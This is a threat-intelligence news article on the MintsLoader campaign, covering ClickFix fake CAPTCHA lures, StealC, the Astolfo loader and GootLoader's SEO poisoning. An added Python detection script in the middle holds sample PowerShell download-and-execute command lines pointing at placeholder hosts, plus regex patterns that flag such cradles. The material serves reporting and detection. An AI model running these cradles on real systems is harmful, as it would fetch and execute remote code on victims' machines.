MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks


Jan 27, 2025 | Ravie Lakshmanan | Malware / SEO Poisoning

Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC.

"MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file," cybersecurity company eSentire said in an analysis.

The campaign has targeted the electricity, oil and gas, and legal services sectors in the United States and Europe, per the company, which detected the activity in early January 2025.

The development comes amid a spike in malicious campaigns that abuse fake CAPTCHA verification prompts to trick users into copying and executing PowerShell scripts to get around the checks, a technique that has come to be known as ClickFix and KongTuke.

"KongTuke involves an injected script that currently causes associated websites to display fake 'verify you are human' pages," Palo Alto Networks Unit 42 said in a report detailing a similar campaign distributing BOINC.

"These fake verification pages load a potential victim's Windows copy/paste buffer with malicious PowerShell script. The page also provides detailed instructions asking potential victims to paste and execute the script in a Run window."

The attack chain documented by eSentire begins when users click on a link in a spam email, leading to the download of an obfuscated JavaScript file. The script is responsible for running a PowerShell command to download MintsLoader via curl and execute it, after which it deletes itself from the host to avoid leaving traces.

Alternate sequences redirect the message recipients to ClickFix-style pages that lead to the delivery of MintsLoader by means of the Windows Run prompt.

The loader malware, in turn, contacts a command-and-control (C2) server to fetch interim PowerShell payloads that perform various checks to evade sandboxes and resist analysis efforts. It also includes a Domain Generation Algorithm (DGA) with a seed value based on the addition of the current day of the month to create the C2 domain name.

The attack culminates with the deployment of StealC, an information stealer sold under the malware-as-a-service (MaaS) model since early 2023. It is assessed to be re-engineered from another stealer malware known as Arkei. One of the notable features of the malware is its ability to avoid infecting machines located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.

News of the MintsLoader campaign also follows the emergence of an updated version of JinxLoader dubbed Astolfo Loader (aka Jinx V3) that has been rewritten in C++, likely for performance reasons, after its source code was sold off by the malware author Rendnza to two separate buyers, Delfin and AstolfoLoader.

"While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary," BlackBerry noted late last year.

"Services like JinxLoader and its successor, Astolfo Loader (Jinx V3), exemplify how such tools can proliferate quickly and affordably and can be purchased via popular public hacking forums that are accessible to virtually anyone with an Internet connection."
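Both delivery paths described above end in the same host-side pattern: a PowerShell process that downloads and executes a payload, spawned either by a script host (the JScript lure) or by explorer.exe (a paste into the Run prompt). The following detection logic is an added example, not code from the article or from eSentire; the process-creation events are constructed, and the `example.invalid` hosts are placeholders.

```python
import re

# Constructed sample process-creation events: (parent image, child image, command line).
# These are illustrative, not telemetry from the campaign.
SAMPLE_EVENTS = [
    ("outlook.exe", "wscript.exe", r"wscript.exe C:\Users\a\Downloads\agreement.js"),
    ("wscript.exe", "powershell.exe",
     'powershell -w hidden -c "curl http://example.invalid/ps1 -o $env:TEMP\\m.ps1; & $env:TEMP\\m.ps1"'),
    ("explorer.exe", "powershell.exe",
     'powershell -ep bypass -c "iwr http://example.invalid/x|iex"'),
    ("explorer.exe", "powershell.exe", 'powershell -c "Get-Date"'),
    ("cmd.exe", "powershell.exe", 'powershell -c "curl https://example.invalid/file -o out.txt"'),
]

# A download cradle needs both a fetch primitive and an execution primitive in one command line.
# In Windows PowerShell, curl and iwr are aliases of Invoke-WebRequest.
DOWNLOAD = re.compile(r"\b(curl|iwr|invoke-webrequest|wget|downloadstring)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression|start-process)\b|&\s*\$", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def classify(parent, child, cmdline):
    """Return a reason string when the event matches one of the two delivery paths, else None."""
    if child.lower() != "powershell.exe":
        return None
    if not (DOWNLOAD.search(cmdline) and EXECUTE.search(cmdline)):
        return None
    p = parent.lower()
    if p in SCRIPT_HOSTS:
        return "download-and-execute PowerShell spawned by a script host (JScript lure)"
    if p == "explorer.exe":
        # explorer.exe is the parent when a command is pasted into the Run window.
        return "download-and-execute PowerShell spawned by explorer (Run prompt / ClickFix paste)"
    return None


def scan(events):
    """Return (child image, reason) for every event that matches."""
    hits = []
    for parent, child, cmdline in events:
        reason = classify(parent, child, cmdline)
        if reason:
            hits.append((child, reason))
    return hits


if __name__ == "__main__":
    for child, reason in scan(SAMPLE_EVENTS):
        print(f"{child}: {reason}")
```

A fetch without execution (the last sample event) is deliberately not flagged, so that routine file downloads from an interactive shell do not raise alerts.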

Cybersecurity researchers have also shed light on the inner workings of the GootLoader malware campaigns, which are known to weaponize search engine optimization (SEO) poisoning to redirect victims searching for agreements and contracts to compromised WordPress sites that host a realistic-looking message board offering a file that contains what they are purportedly looking for.

The malware operators have been found to make changes to the WordPress sites that cause these sites to dynamically load the fake forum page content from another server, referred to as the "mothership" by Sophos.

GootLoader campaigns, in addition to geofencing IP address ranges and allowing requests to originate only from specific countries of interest, go further by permitting the potential victim to visit the infected website only once in 24 hours by adding the IP to a block list.

"Every aspect of this process is obfuscated to such a degree that even the owners of the compromised WordPress pages often can't identify the modifications in their own site or trigger the GootLoader code to run when they visit their own pages," security researcher Gabor Szappanos said.
